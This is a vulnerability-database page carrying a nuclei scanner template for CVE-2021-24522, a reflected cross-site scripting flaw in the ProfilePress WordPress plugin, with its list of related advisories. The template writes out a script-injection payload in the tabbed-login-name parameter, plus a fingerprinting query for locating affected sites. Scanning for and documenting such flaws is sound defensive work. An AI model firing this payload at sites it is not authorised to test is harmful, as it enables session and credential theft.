Lucene search
K

ProfilePress < 3.1.11 - Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

ProfilePress plugin before 3.1.11 allows XSS via tabbed login/register widget; update needed.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24522
5 Jun 202521:02
circl
CNNVD
WordPress 跨站脚本漏洞
9 Aug 202100:00
cnnvd
CVE
CVE-2021-24522
9 Aug 202110:04
cve
Cvelist
CVE-2021-24522 ProfilePress < 3.1.11 - Unauthenticated Cross-Site Scripting (XSS) in tabbed login/register widget
9 Aug 202110:04
cvelist
EUVD
EUVD-2021-11434
7 Oct 202500:30
euvd
NVD
CVE-2021-24522
9 Aug 202110:15
nvd
OpenVAS
WordPress ProfilePress Plugin < 3.1.11 XSS Vulnerability
28 Sep 202100:00
openvas
OSV
CVE-2021-24522
9 Aug 202110:15
osv
Prion
Code injection
9 Aug 202110:15
prion
Positive Technologies
PT-2021-16044 · WordPress · Profilepress
9 Aug 202100:00
ptsecurity
Rows per page
id: CVE-2021-24522

info:
  name: ProfilePress < 3.1.11 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The ProfilePress plugin for WordPress before 3.1.11 is vulnerable to unauthenticated reflected cross-site scripting (XSS) via the tabbed login/register widget due to improper escaping of user input. Attackers can inject arbitrary JavaScript via the tabbed-login-name parameter.
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in the tabbed login widget, potentially stealing user credentials or session cookies.
  remediation: |
    Update the ProfilePress plugin to version 3.1.11 or later.
  reference:
    - https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697/
    - https://plugins.trac.wordpress.org/changeset/2561271/wp-user-avatar
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24522
  classification:
    cve-id: CVE-2021-24522
    cwe-id: CWE-79
    epss-score: 0.01285
    epss-percentile: 0.66652
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
  metadata:
    max-request: 2
    fofa-query: body="wp-content/plugins/wp-user-avatar"
  tags: cve,cve2021,wordpress,wp,wp-plugin,wp-user-avatar,profilepress,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'wp-user-avatar'
        internal: true

  - raw:
      - |
        GET {{path}}/?tabbed-login-name="><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /
        - /wp-login
        - /wp-login.php

    host-redirects: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ceb9c8b9dcbb02034147b88b889b2c8f1d93f2d637d1a659ead73a5107793145022002b27c7bdbe063d0cbcdbaa2bf938aeccd39d0d9a49829d4a32ff06862f4214f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01285
35